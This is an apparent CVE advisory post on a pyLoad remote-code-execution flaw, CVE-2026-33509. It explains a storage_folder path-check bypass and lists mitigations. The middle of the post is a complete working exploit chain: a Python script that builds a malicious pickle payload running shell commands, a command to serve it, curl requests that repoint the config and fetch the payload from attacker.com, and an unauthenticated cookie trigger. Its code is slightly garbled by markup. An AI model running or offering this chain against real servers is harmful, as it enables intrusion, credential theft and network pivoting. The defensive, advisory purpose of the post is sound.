pyLoad, RCE, CVE-2026-33509 (Critical)

Listen to this Post

How CVE-2026-33509 works: A non-admin user with SETTINGS and ADD permissions changes the storage_folder config option to the Flask filesystem session directory (/tmp/pyLoad/flask/). The existing path check only blocks writing inside PKGDIR or userdir, but the session directory lies outside both. The attacker then computes the session filename as md5(“session:” + attacker_session_id) and hosts a malicious pickle payload at that predictable path. Using the ADD permission, they download that payload into the session directory via a download link. Finally, any unauthenticated HTTP request carrying the corresponding session cookie triggers Flask-Session to load the file using cachelib’s FileSystemCache, which deserializes the pickle data with pickle.load(). The malicious reduce method executes arbitrary commands, such as writing a file or spawning a reverse shell, achieving RCE with the privileges of the pyLoad service user.

dailycve form:

Platform: pyLoad download manager
Version: latest Docker image
Vulnerability: Settings+Add RCE
Severity: Critical severity 9.8
date: 2026 January 10

Prediction: Patch date 2026-04-30

What Undercode Say:

Generate malicious session pickle
python3 -c "
import pickle, os, struct
class RCE:
def <strong>reduce</strong>(self):
return (os.system, ('id > /tmp/pwned',))
session = {'_permanent': True, 'rce': RCE()}
payload = struct.pack('I', 0) + pickle.dumps(session, protocol=2)
with open('92912f771df217fb6fbfded6705dd47c', 'wb') as f:
f.write(payload)
"
Serve payload
python3 -m http.server 8080
Change storage_folder via API
curl -X POST http://target:8000/api/set_config_value \
-H "Content-Type: application/json" \
-d '{"section":"core","category":"general","option":"storage_folder","value":"/tmp/pyLoad/flask"}'
Download payload
curl -X POST http://target:8000/api/add_package \
-H "Content-Type: application/json" \
-d '{"name":"x","links":["http://attacker.com:8080/92912f771df217fb6fbfded6705dd47c"],"dest":1}'
Trigger RCE (unauthenticated)
curl http://target:8000/ -b "pyload_session_8000=ATTACKER_SESSION_ID"

Exploit:

1. Non-admin user changes storage_folder to /tmp/pyLoad/flask.

  1. Compute session file MD5 from attacker-controlled session ID.
  2. Host pickle payload at that filename and download it via ADD permission.
  3. Send HTTP request with crafted session cookie → pickle.load() RCE.

Protection from this CVE:

  • Add (“general”, “storage_folder”) to ADMIN_ONLY_OPTIONS set.
  • Extend path check to block writing to Flask session dir, Jinja cache, and pyLoad temp dirs.
  • Upgrade to patched version after 2026-04-30 or apply the fix manually.
  • Use signed sessions (SESSION_TYPE=”redis” or “memcached”) instead of filesystem.

Impact:

Arbitrary code execution as pyLoad service user. Attacker can read API keys, credentials, environment variables, access download history, user database, and pivot to internal network resources. No authentication required for final trigger.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top